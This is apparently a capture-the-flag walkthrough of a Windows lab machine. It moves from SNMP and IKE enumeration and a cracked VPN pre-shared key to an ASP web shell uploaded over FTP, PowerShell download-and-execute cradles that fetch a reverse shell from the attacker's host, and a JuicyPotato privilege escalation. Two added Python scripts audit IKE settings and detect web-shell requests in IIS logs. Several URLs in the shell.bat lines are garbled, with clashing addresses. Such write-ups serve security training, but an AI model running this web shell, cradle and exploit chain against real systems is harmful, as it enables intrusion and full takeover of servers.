nmap -A -p- -oA output 10.129.155.64 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA conceal 10.129.155.64

gobuster dir -k -u http://10.129.155.64/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

nmap -sU -O -p- -oA conceal-udp 10.129.155.64

nmap -sU -p 160-165 10.129.155.64

nmap -sU -sC --top-ports 20 -oA udp-conceal 10.129.155.64

We can see that snmp-netstat shows us some open TCP ports.

snmpwalk -v 2c -c public 10.129.155.64

We go to crackstation.net and enter the password, which appears to be Dudecake1!

We try to connect to the VPN.

ike-scan -M 10.129.155.64

We can see that the Internet Key Exchange (IKE) is encrypted with DES, with a SHA-1 hash. The IKE version is v1, not v2.

%any : PSK "Dudecake1!"

The info is entered in /etc/ipsec.conf and /etc/ipsec.secrets.

charondebug is there so we can troubleshoot the connection. authby selects PSK authentication. esp, ike and keyexchange are taken from the ike-scan output. left and right are the two machines. type=transport is for a host-to-host connection.

ipsec restart

ipsec up conceal
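The two steps above (reading the transform off ike-scan, then filling in authby/ike/esp/keyexchange/left/right/type) can be done mechanically. The following is an added example, not code from the writeup: it parses a constructed ike-scan line in the Main Mode output shape, maps the attributes to strongSwan proposal keywords, lists the weak choices a defender would flag (DES, SHA-1, 1024-bit DH, IKEv1, PSK), and renders the conn block. The `left`/`right` addresses are caller-supplied placeholders and the connection name `conceal` is taken from the notes.

```python
"""Added example (not part of the writeup): read the transform that ike-scan
reports, translate it into strongSwan 'ike=' / 'esp=' proposal keywords, list
the weak choices, and render the conn block the notes describe.
Assumptions: the SA=(...) line shape follows ike-scan's Main Mode output;
the sample below is constructed; left/right addresses are placeholders
passed in by the caller.
"""
import re

# Constructed ike-scan line (matches what the notes report: DES, SHA1, PSK, IKEv1).
SAMPLE_IKE_SCAN = (
    "10.129.155.64\tMain Mode Handshake returned "
    "HDR=(CKY-R=0123456789abcdef) "
    "SA=(Enc=DES Hash=SHA1 Auth=PSK Group=2:modp1024 "
    "LifeType=Seconds LifeDuration=28800)"
)

HASH_KEYWORDS = {"MD5": "md5", "SHA1": "sha1", "SHA2-256": "sha256",
                 "SHA2-384": "sha384", "SHA2-512": "sha512"}

WEAK = {
    "des": "single DES: 56-bit key, brute-forceable",
    "3des": "3DES: 64-bit block cipher, deprecated",
    "md5": "MD5: broken hash",
    "sha1": "SHA-1: deprecated, avoid for new deployments",
    "modp768": "DH group 1 (768-bit): far too small",
    "modp1024": "DH group 2 (1024-bit): below current minimums",
}


def parse_sa(line: str) -> dict:
    """Return the key=value pairs inside SA=(...) plus the IKEv1 exchange mode."""
    m = re.search(r"SA=\(([^)]*)\)", line)
    if not m:
        raise ValueError("no SA=(...) block in ike-scan line")
    attrs = dict(kv.split("=", 1) for kv in m.group(1).split())
    attrs["mode"] = "aggressive" if "Aggressive Mode" in line else "main"
    return attrs


def strongswan_keywords(attrs: dict) -> tuple:
    """Map ike-scan names to strongSwan proposal keywords (enc, hash, dh group)."""
    enc = attrs.get("Enc", "").upper()
    if enc == "AES":                      # ike-scan prints AES plus KeyLength=N
        enc_kw = "aes" + attrs.get("KeyLength", "128")
    else:
        enc_kw = enc.lower()              # DES -> des, 3DES -> 3des
    hash_name = attrs.get("Hash", "").upper()
    hash_kw = HASH_KEYWORDS.get(hash_name, hash_name.lower())
    group_kw = attrs.get("Group", "").split(":")[-1]   # "2:modp1024" -> modp1024
    return enc_kw, hash_kw, group_kw


def to_proposals(attrs: dict) -> tuple:
    """Build the ike= and esp= strings strongSwan expects for this transform."""
    enc, hsh, group = strongswan_keywords(attrs)
    return f"{enc}-{hsh}-{group}", f"{enc}-{hsh}"


def audit(attrs: dict) -> list:
    """List why this transform would fail a hardening review."""
    findings = [f"{kw}: {WEAK[kw]}" for kw in strongswan_keywords(attrs) if kw in WEAK]
    if attrs.get("Auth") == "PSK":
        findings.append("PSK: tunnel security rests on the secret, which here was readable over SNMP")
    findings.append(f"IKEv1 {attrs['mode']} mode: IKEv2 is preferred")
    return findings


def render_ipsec_conf(attrs: dict, left: str, right: str, name: str = "conceal") -> str:
    """Render the strongSwan conn block with the keys the notes explain."""
    ike, esp = to_proposals(attrs)
    return "\n".join([
        "config setup",
        '    charondebug="ike 2, knl 2, cfg 2"',   # verbose logging for troubleshooting
        "",
        f"conn {name}",
        "    authby=psk",          # pre-shared key comes from /etc/ipsec.secrets
        "    auto=add",
        f"    ike={ike}",          # taken from ike-scan
        f"    esp={esp}",
        "    keyexchange=ikev1",   # ike-scan answered a Main Mode (IKEv1) handshake
        f"    left={left}",        # our host
        f"    right={right}",      # the target
        "    type=transport",      # host-to-host, no subnets behind either side
    ]) + "\n"


if __name__ == "__main__":
    sa = parse_sa(SAMPLE_IKE_SCAN)
    for finding in audit(sa):
        print("weak:", finding)
    print(render_ipsec_conf(sa, left="10.10.14.116", right="10.129.155.64"))
```

Run it as-is to see the audit findings and the rendered conn block; the rendered text is what would go into /etc/ipsec.conf, with the PSK line from the notes in /etc/ipsec.secrets. On the defensive side, the same audit applied to a production gateway's ike-scan output is a quick check that no DES/SHA-1/modp1024 proposals are still accepted.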

I was getting this error when I tried to connect. In the end I had to install the following:

sudo apt install strongswan strongswan-pki libcharon-extra-plugins libcharon-extauth-plugins libstrongswan-extra-plugins

nmap -sT -p- --min-rate 10000 -oA alltcp_vpn 10.129.155.64

nmap -sT -p 21,80,135,139,445 -sC -sV -oA scripts_vpn 10.129.155.64

nmap -sC -sV -sT -o full 10.129.155.64
ftp 10.129.155.64

I tried to upload an aspx file and got an error. I was able to upload txt and asp files.

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

curl http://10.129.155.64/upload/cmd.asp?cmd=whoami

python -m http.server 8888

nc -lvnp 4444

http://10.129.155.64/upload/cmd.asp?cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http://10.10.14.116:8888/Invoke-PowerShellTcp.ps1%27)
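The requests above leave a clear trace in the IIS logs: a server-side script executed from the FTP-writable upload directory, a command in the query string, and a download cradle pointing at an external host. The following is an added detection example, not code from the writeup: it parses a constructed IIS W3C log excerpt (the field list is the standard W3C layout; the three lines are made up to mirror the requests in the notes), URL-decodes the query, and tags each request with the rule it trips. The root cause on the defender's side is the FTP root being mapped into the web root with script execution enabled; disabling script execution for the upload folder removes the whole class.

```python
"""Added example (not part of the writeup): flag web-shell style requests in
IIS W3C logs. The log text is constructed; field names follow the standard
IIS W3C '#Fields:' header.
"""
from urllib.parse import unquote

# Constructed IIS log excerpt modelled on the requests in the notes (not a real capture).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-referer sc-status sc-substatus sc-win32-status time-taken
2021-05-20 15:10:02 10.129.155.64 GET /index.html - 80 - 10.10.14.116 Mozilla/5.0 - 200 0 0 3
2021-05-20 15:24:59 10.129.155.64 GET /upload/cmd.asp cmd=whoami 80 - 10.10.14.116 curl/7.74.0 - 200 0 0 15
2021-05-20 15:34:14 10.129.155.64 GET /upload/cmd.asp cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http://10.10.14.116:8888/Invoke-PowerShellTcp.ps1%27) 80 - 10.10.14.116 Mozilla/5.0 - 200 0 0 120
"""

# Server-side extensions that should never be served from a user-writable directory.
SCRIPT_EXT = (".asp", ".aspx", ".ashx", ".asmx", ".php", ".jsp")
# Directories that FTP (or any upload feature) writes into; adjust to the site layout.
UPLOAD_DIRS = ("/upload/", "/uploads/", "/files/")
# Tokens that only make sense if the query string is being handed to a shell.
COMMAND_MARKERS = ("whoami", "powershell", "iex", "downloadstring", "downloadfile",
                   "cmd.exe", "net.webclient", "invoke-expression", "systeminfo")


def parse_iis_log(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields: header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        if fields is None:
            raise ValueError("log line seen before #Fields: header")
        yield dict(zip(fields, raw.split()))   # IIS percent-encodes spaces, so split() is safe


def classify(rec: dict) -> list:
    """Return the names of every rule this request trips (empty list if benign)."""
    rules = []
    stem = rec["cs-uri-stem"].lower()
    query = unquote(rec.get("cs-uri-query", "-")).lower()
    if stem.endswith(SCRIPT_EXT) and stem.startswith(UPLOAD_DIRS):
        rules.append("script-executed-from-upload-dir")
    if query != "-" and any(marker in query for marker in COMMAND_MARKERS):
        rules.append("command-like-query-string")
    if "http://" in query or "https://" in query:
        rules.append("remote-url-in-query")
    return rules


def scan(text: str) -> list:
    """Return (time, uri-stem, raw query, rules) for every request that trips a rule."""
    hits = []
    for rec in parse_iis_log(text):
        rules = classify(rec)
        if rules:
            hits.append((rec["time"], rec["cs-uri-stem"], rec["cs-uri-query"], rules))
    return hits


if __name__ == "__main__":
    for when, stem, query, rules in scan(SAMPLE_IIS_LOG):
        print(when, stem, query[:60], ",".join(rules))
```

The first rule fires on its own even for a harmless-looking request, because any script served from the upload directory means the FTP-to-webroot mapping is already a problem; the other two narrow down which requests actually ran commands or pulled a payload.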

systeminfo

whoami /priv

Since we can see it has SeImpersonatePrivilege, we can use JuicyPotato.

We create a shell.bat file:

powershell -c iex(new-object net.webclient).downloadstring('[http://10.10.14.31/](http://10.10.14.110:5555/)shell2.ps1')
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell2.ps1
powershell -c iex(new-object net.webclient).downloadstring('[http://10.10.14.31/](http://10.10.110/shell2.ps1')
(new-object net.webclient).downloadfile('http://10.10.14.110/shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')

nc -lvnp 443

./juicy.exe -p shell.bat -l 1337 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

copyright©2022 Cu3rv0x all rights reserved